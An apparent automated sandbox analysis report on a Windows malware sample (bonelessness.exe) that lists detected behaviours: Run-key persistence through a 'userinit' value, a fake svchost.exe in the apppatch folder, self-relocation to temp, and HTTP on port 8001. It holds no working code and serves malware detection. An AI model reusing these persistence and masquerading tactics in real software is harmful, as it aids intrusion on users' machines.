Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run userinit			Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run userinit			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Moves itself to temp directory

Source: c:\users\user\desktop\bonelessness.exe

File moved: C:\Users\user\AppData\Local\Temp\5FC5.tmp

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 51116 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 51116
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 51116
Source: unknown	Network traffic detected: HTTP traffic on port 51119 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 51119
Source: unknown	Network traffic detected: HTTP traffic on port 64294 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 64294
Source: unknown	Network traffic detected: HTTP traffic on port 64295 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 64295

Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D2CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	1_2_02D2CBF0
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D2CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	1_2_02D2CBF0
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D2CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	1_2_02D2CBF0
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D2CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	1_2_02D2CBF0
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D2CB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	1_2_02D2CB80
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D2D130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	1_2_02D2D130
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D2CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	1_2_02D2CE19
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D2CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	1_2_02D2CE19
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D29C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	1_2_02D29C80
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_0289CB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	5_2_0289CB80
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_0289CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_0289CBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_0289CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_0289CBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_0289CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_0289CBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_0289CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_0289CBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_0289D130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	5_2_0289D130
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_0289CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_0289CE19
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_0289CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	5_2_0289CE19
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_02899C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	5_2_02899C80
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0244CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0244CBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0244CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0244CBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0244CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0244CBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0244CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0244CBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0244CB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	6_2_0244CB80
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0244D130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	6_2_0244D130
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0244CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0244CE19
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0244CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0244CE19
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_02449C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	6_2_02449C80
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012ED130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	8_2_012ED130
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012ECB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	8_2_012ECB80
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_012ECBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_012ECBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_012ECBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012ECBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_012ECBF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012E9C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	8_2_012E9C80
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012ECE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_012ECE19
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012ECE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	8_2_012ECE19

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D2BA40 HeapCreate,GetCurrentProcessId,RegisterWindowMessageA,OpenFileMappingA,OpenMutexA,MapViewOfFile,OpenFileMappingA,OpenMutexA,OpenMutexA,MapViewOfFile,Sleep,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,WaitForSingleObject,WaitForSingleObject,OpenFileMappingA,MapViewOfFile,ReleaseMutex,GetHandleInformation,CloseHandle,Sleep,ReleaseMutex,WaitForSingleObject,OpenFileMappingA,MapViewOfFile,ReleaseMutex,OpenEventA,GetTickCount,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,

1_2_02D2BA40

Source: C:\Windows\apppatch\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
